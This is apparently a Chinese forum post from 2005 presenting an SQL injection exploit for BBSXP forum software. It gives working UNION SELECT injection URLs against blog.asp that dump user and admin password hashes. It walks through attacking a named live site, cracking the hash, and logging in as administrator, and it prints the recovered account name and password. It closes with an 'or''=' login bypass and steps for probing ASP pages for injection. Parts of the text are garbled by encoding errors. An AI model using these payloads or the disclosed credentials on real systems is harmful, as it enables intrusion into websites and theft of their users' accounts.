BBSXP最新漏洞

漏洞日期:2005年7月1日
受害版本號:眼下全部BBSXP
漏洞利用:
查前臺password注入語句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后臺password注入語句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5

首先打開 www.google.com 在輸入Po......bBsxp5.15有非常多這種論壇，隨便點個，好就這個bbs.yuntea.com 真幸運，這個站還沒打上補丁，一口做氣殺究竟，bbsxp5.15最新漏洞?
漏洞主要出在BLOG.ASP 能夠讓直接構造數(shù)據(jù)庫命令??
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig]?
后臺區(qū)長的md5password就顯示出來了。?
前臺password也能夠出來，?
網上已經有相關動畫，軟件。?
就利用這個漏洞，肯定有一批bbsxp的站點要倒下了?
接下來就是講工具了，準備好MD5password破解器?
關于md5的破解，比較好使的有md5cracker速度增強版。?
1。先用8位或9位數(shù)字跑。非?？?。?
2。假設不行，用小寫字母跑。選擇5－6位比較好。?
3。再不行，說明password可能使字母加數(shù)字，能夠碰碰運氣。能夠配置一個精品自典，比方10G的，?
?? 跑上及幾個小時。（你的機器配置必須非常好）?
4。再不行，建議放棄，太變態(tài)了。?
前臺ok...后臺password..（注：你必須知道管理員的帳號）?
直接默認的配置就是直接拿下后臺password...?
直接吧前臺md5password暴出來。?
剩下的事就事破解md5了。?
如今開始進行工作了，在 http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig ]?
就成了 http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig ]?
他的password是7CB2BE65EB9F215215A0725A10B6E39E可能前臺的password和后臺一樣，假設有2個加密password那就是代表1個是前臺的一個是后臺的，不多說了，看操作?
依照上面工具的介紹先用數(shù)字把，?
正在破===耐心等等?
我接條信息，大家不介意把~?
出來了，password是82246124，登入，，他的帳號是wzwu，password82246124，登入成功，后臺登入，password82246124，登入成功，以下的因該知道把，我也就不多說了，以免遭到人家的痛罵。?
bBsxp5.15最新漏洞的原始作者不清

74D2710BD75C06A057E842C8CA55C576

名'or''='password也是'or''='
?'
一般ASP系統(tǒng)都有相似以下的URL：http：//www.xxx.com/xxx.ASP？ID＝××，我們僅僅往在這種URL后加上一個單引號，假設返回server錯誤信息，那么就說明了程序并沒有過濾單引號，并且從返回的錯誤信息中的了能夠得到server的一些相關配置信息。接著接交http:/www.xxx.com/xxx.asp?id=××
????? and 1=1、http:/www.xxx.com/xx.asp?id=×× and
????? 1=2，假設返回的頁面不一樣，說明頁面能夠注入。